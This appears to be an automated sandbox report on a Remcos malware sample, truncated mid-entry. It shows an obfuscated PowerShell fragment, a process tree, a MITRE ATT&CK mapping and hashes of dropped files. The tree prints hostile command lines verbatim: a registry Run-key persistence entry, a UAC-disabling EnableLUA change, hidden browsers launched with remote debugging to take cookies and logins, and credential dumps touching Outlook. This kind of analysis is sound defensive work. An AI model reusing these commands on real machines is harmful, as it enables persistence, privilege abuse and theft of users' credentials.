DFitmLTra BAlba Ov r=Isva MyngBissEBal TSeku-F.rbc anto K uNMotot ClyEPrednDispt lde M nu$Pat.M ThyoPattRLititSkamMSociARougi CheNna bs Pit ');Prostern (Pickleworm 'Tire$Phylg Sa l VejoPtysbEgepaMin,lN ve:KompWarveaPen,gAffonmepheBro rHjrniKattaRe,vnFla aSten Sta=C si Aars[Q avSUnmoyManis .vet.vere UbemTr v.ForaCChl.oArimnSte vOvereP eorBra tSmad]Unde:play: P oFRevirAgteoEyesm.isfB K ba .vesFrileFor 6Supr4MakeSSagstInkorBjrgiUntanSy,hgFlip(Elev$KillU utnBantdBortlBro bEtti)Mona ');Prostern (Pickleworm 'Pres$CockGNo,cLSkraO F rBpostaBasnLNo,f:Sau bLandAFernRY,msIpr sSInte Wenn=Rea Rinc[ResiSSkanySignS Ol Tde eePau,MFibr.He ttTeeuEPri.xskumtSyna.Supee Un nTiptcUnceoSi hDRidsI VagNIdnhGSwit]Scre:Ti b: NemAAalbSCla cyo siUdpriElec. dr gValgEIdeitSpresKjerT turRVen,I AntNGhaugGu s(Orig$PommWKeloaCantGHoplnVarsE MasrPel,ItoxiAN naN SpaA Wel)Oe e ');Prostern (Pickleworm 'Sco $Pen gF.rrlBangOAmbuB PeraCa cLBibe:ShoruRefrN NeuCFrafU anRUnclsInc I steN Anng.isk=,lip$NonrBPaciaTe.eR Ta.I .orS her.Rap STol,U AntB,ttrsLy,eTDisnRPaakIquinNSupeglort(Wa d$Gemmt ampHtyndERedioMildroppoi PlaSKittE TopsAfsk,Mpon$ShimdVirkeMateVSteniSeafL.kud) dib ');Prostern $uncursing;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Staalwiren205% -windowstyle 1 $Preally=(gp -Path 'HKCU:\Software\Gothonic\').priceite;%Staalwiren205% ($Preally)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3104
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Staalwiren205% -windowstyle 1 $Preally=(gp -Path 'HKCU:\Software\Gothonic\').priceite;%Staalwiren205% ($Preally)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3404
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2392
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb66a1cc40,0x7ffb66a1cc4c,0x7ffb66a1cc58
      4⤵
      PID:4380
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:2
      4⤵
      PID:1476
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2000 /prefetch:3
      4⤵
      PID:1612
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
      4⤵
      PID:2516
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3184,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3204 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1696
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4496
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4632 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3212
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
      4⤵
      PID:3648
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,8685095265177708258,5584171278786078534,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
      4⤵
      PID:1816
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\tgtnidaxcghgfnjiv"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3880
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wiggjvlqqozlhtxmnfjt"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:2784
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gclqkowsewrprhtqwqwmhivm"
    3⤵
    PID:3972
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gclqkowsewrprhtqwqwmhivm"
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gclqkowsewrprhtqwqwmhivm"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb668d46f8,0x7ffb668d4708,0x7ffb668d4718
      4⤵
      PID:3144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
      4⤵
      PID:3280
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
      4⤵
      PID:1984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2876 /prefetch:8
      4⤵
      PID:1372
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5004
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2228,2742194834777997707,1070946881077655603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:4560

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2516

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1328

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Authentication Process

T1556

Modify Registry

T1112

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
1e896cca864708a5e332a18d470bcebe

SHA1
0d035915ae3b05288621dd0047dc9fb9d55c8f7d

SHA256
7bb9706b4e14579185a91374b9874dd615e34d4ad511c9c3b67fcfafe839d0a5

SHA512
9cd8582c8827666a3e9f197c587ffdc25931cf1ecb2bb8ffbacb4ef02c72122b0f99bae0ee4016c5141eeb7c7e14fe72ba02db5b9a1aa70ed6fdaf178e5088e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71444def27770d9071039d005d0323b7

SHA1
cef8654e95495786ac9347494f4417819373427e

SHA256
8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

SHA512
a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
40B

MD5
4d20a45efcca4452eb5eb0326fa218b5

SHA1
7af77664333f24187040d1409f00bbb5d04f5fe3

SHA256
0905a19771490996b29d4127cc910789b003cd31ee0434603cca242ff0b1ab1e

SHA512
d3f0b037743acb90d0dd3c6b75a48e2f4659cb2d16fac2431cf98fb769cba44ce43fedf6295a830e45b5ec5086772801a05b80939001cebf7677e70c7cd39b0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
8fdcbe5bb49ff495b9d686156b33ea66

SHA1
bbdc6bd1ac04dd0ea14ec2d9bd5f6f100865433a

SHA256
2f24b3b8cc9389f3e651d86da3f4496b21cbd9e3bdf63d6f93de464d64124786

SHA512
13c01ead5a799f6aff2f6567606e9d083dc0d620b58d3ffe0c01c483c2296388ea3ef61557b22f6d54b2b14c036d3715b393b66f0f9406592ab9e08b780c2e2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
026fc7155c677c377a8192c8054f281c

SHA1
b28483a15fe6f0cdfb0482711636d89095b83307

SHA256
cce1369c8371dc845f3fe8be528d05f6f14543c1f2c8577cb574ab218cd08dee

SHA512
27f89a9cf48e7ee25a2ccfc9743cfdad39bdd2c138338db59eba28742741d185f9c294bd22adddc34a2c0646a9548438813424b05d1c1820e1ed6a4fafc01666

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

Filesize
152B

MD5
fd2e685c09b52bd3b119d02f2d4ebd42

SHA1
9279027cde6bb61d50dcafdf5b3877628a05af4a

SHA256
20bdc90605391bc33381dd90e49bed52ecb79b16c8304d9d5ceb3571b39eb937

SHA512
9367f1a42b36c4a2e5bf281724a189ea3da4cad2be1441b9bf1a63cc14c7bb733643357342828bebe1712f5adb3080ddadb2be65aa403c962a1e7905f3019911

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

Filesize
20B

MD5
9e4e94633b73f4a7680240a0ffd6cd2c

SHA1
e68e02453ce22736169a56fdb59043d33668368f

SHA256
41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304

SHA512
193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
d0e37c19ebb1593eed73f2eddb30a92d

SHA1
981fd2d44998e5a6d034bb2def6d6e6affbf3022

SHA256
b470fac96728c73f517bd3995849deb606f0fb20d97eb2323ed450f441113156

SHA512
e02946863a5006bd8a954a0c196fac5675f009cbdce35d7c732a160ba55602705fc2afaf13309ba4f7136f0c3863432ff88a36b5abc0172ce5ad405923d91e96

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

Filesize
48B

MD5
3c7a3f9ccaf9b1ff7737afba4e4d4ae1

SHA1
2bcdef74a4bb2b82c6d591a2108b4189cc89eded

SHA256
fa3b81cab3453b3a7cc5b2ab0935e01769ac71328561128e1d34198b291fe38b

SHA512
7312f2ac0cda2301ea795ddaeac1a525769d7c44ac68d6be8961cc14ae1248539bd96146c90dd0a9675ed90ab2b9ddde4c3c41d81a7103d71f30245c589fcb66

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

Filesize
20KB

MD5
b40e1be3d7543b6678720c3aeaf3dec3

SHA1
7758593d371b07423ba7cb84f99ebe3416624f56

SHA256
2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4

SHA512
fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

Filesize
256KB

MD5
d496eb2330f138c809e1279f2b506c95

SHA1
e4bfce6cc0a63db7de601e1bfe7c95f6131ce335

SHA256
7c82e1d4caed476d89fbfbb53f53378ffc74cea341d59d9822493e1f925f2410

SHA512
9e246b8ede5d9bc0abc9639701c14e4d573c7a3560f38dbc2d83c2ec9c37939ee1de4951da125cd7888bc8956dc0b8b3ce43a7283274c943960e53bacb6062c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

Filesize
192KB

MD5
d30bfa66491904286f1907f46212dd72

SHA1
9f56e96a6da2294512897ea2ea76953a70012564

SHA256
25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907

SHA512
44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

Filesize
277B

MD5
ac1078da4826a3e1d6245218a48a6ab2

SHA1
d825a0d8a61461d1e1c8ee83421edc2cc814eb88

SHA256
1aca3e8a318ead3464953d639dd0ed52265b004eb883431b584bb458ec4830e3

SHA512
b518dcc9019dfd2648ce5fceaa59fe6a4349131ad51740fc49bf1f4d25336d17ec45abc9bf69ecc844a014f921205b86cccbdb2738dab0f99aa200be8f3028fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

Filesize
1KB

MD5
e3ebb807c1344b37db9d60c9cf7be040

SHA1
1c7ef631e251ad761a328abd34be6693ebf38463

SHA256
dd4864e08c6e2299d2ed316765a2536e39d14653fee2a97e4ac8ca61e1b3caad

SHA512
6f2cf489dcd3229f48a8d4b3cd53826e0131c33d96400aea53d7153ff932a2f80e58a9775507ad0c248f55baed7a61ae0a6170a0003774db3fd49d72e1904958

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

Filesize
20KB

MD5
1ff7b37068cb23a3b91adf01458de257

SHA1
70fc8a99c8bd123cb98e7bc08b3b6b77e6f12d72

SHA256
0a5c4fd95d63ba3d5a9ddb3836a4e879229237d5865509d000bec385243400b0

SHA512
da3d1289e52b08892664f29852b799adb1ff8116a2f9a4c2d399025f1f332b8d03153cfc40d88dfa94e163bd9179f9459d18ccbd8dc7392574f2baeafee245ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
1KB

MD5
5386b112fa0b22a45f72028ce295ee8b

SHA1
d3d2e5eed63f1a936bef8f91fd5cd7d428d97152

SHA256
292c54382483f19e3d6b68359299d9fb2a328d4545085dd1d0fe01fddb48eeba

SHA512
3f1fb663e1e7c04dc417f0c65db6de30acc3706f1a45c640fde8e64978db7a0229ed624f07914b6e25ced7a5a44145243036c4949a5f367e66969bf70d909819

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

Filesize
5KB

MD5
c0df54c6f41512e8b1750552ae3d039d

SHA1
d56a8b3529f15d4e5e70927fbb8e85fb49d76552

SHA256
34c5b5f8182e5eae6731d6bfe6c364c3ad074da49832ded0817fee18cf667849

SHA512
52ea0fe4b8f813e48c0bc95d4d31e0c4c27ec775f16711907374c6aad0b8e9914c7e8ceb019acee29357822c2117a11a564e2c20a6421ba436b7c4c6714d4113

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
24KB

MD5
fb9b644175d9cb9412afa02e5162aa36

SHA1
549e99099f845f414e650dc71c41a2165b29f64a

SHA256
ef5bacdc32263d63240194ea3cdf60c69dffb9544e0d59730d35fcf5d89fd6d8

SHA512
b021b24fac3cba795ea5165108a79853a9f2b1c3ba78359c4f251e3b1953fc6b1ab753658c2bc8d11dfcb2dd5b696d89240e8c99fd41a5146615c8553f8905f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

Filesize
15KB

MD5
e2f6740589a4b570eae3bde32ad6e60e

SHA1
f480cb3fe10ff7338916edbea9ed63bd01175122

SHA256
56cf9ec20fd3892b742bf6518f974734d753e9fd5157b33199d8b82c8a09c318

SHA512
4148c0ab36f82aa31d3343eeae7c16e7c66b948aa0124efa207b76ae067b33c8b4495faa25f6f2241408bc400f45e86b3c33ec0d2c5323065b320747565ac42e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

Filesize
241B

MD5
9082ba76dad3cf4f527b8bb631ef4bb2

SHA1
4ab9c4a48c186b029d5f8ad4c3f53985499c21b0

SHA256
bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd

SHA512
621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

Filesize
279B

MD5
2cf5f792078b5cf486ae1b89d0b70010

SHA1
ed90e430e11ca4c867f57e9faafe144e4d24aa5f

SHA256
6d1e55f370f78eb04eb77f90f3c01d877f6d89ec2bfec4d44befec990f3ad080

SHA512
3c0b34427fc62d77870c1ff270c3b62a630e4492d4d7468cbe12196a60dc5d04101162ec83fab4355ef03b2f2b5b048f58e1df579398a05ab44be4497bee1e4f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
265B

MD5
f26d2b99b20df5e8641b98fa2435b9d0

SHA1
721facb19d2bb9abc1610ca3400dcc3b07373573

SHA256
f9b787d412dfcbbf324eabd7a93926b17b79499eeccd23c79d1785539ed55594

SHA512
9855cbc05edd2c6c813770e6b5d606b857aa995f3cca97816437078c9cbfe42ba55a9dd9bf339072a645736b8c248f69e2738f1164164fbdadf5cc276ba4adfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000001.dbtmp

Filesize
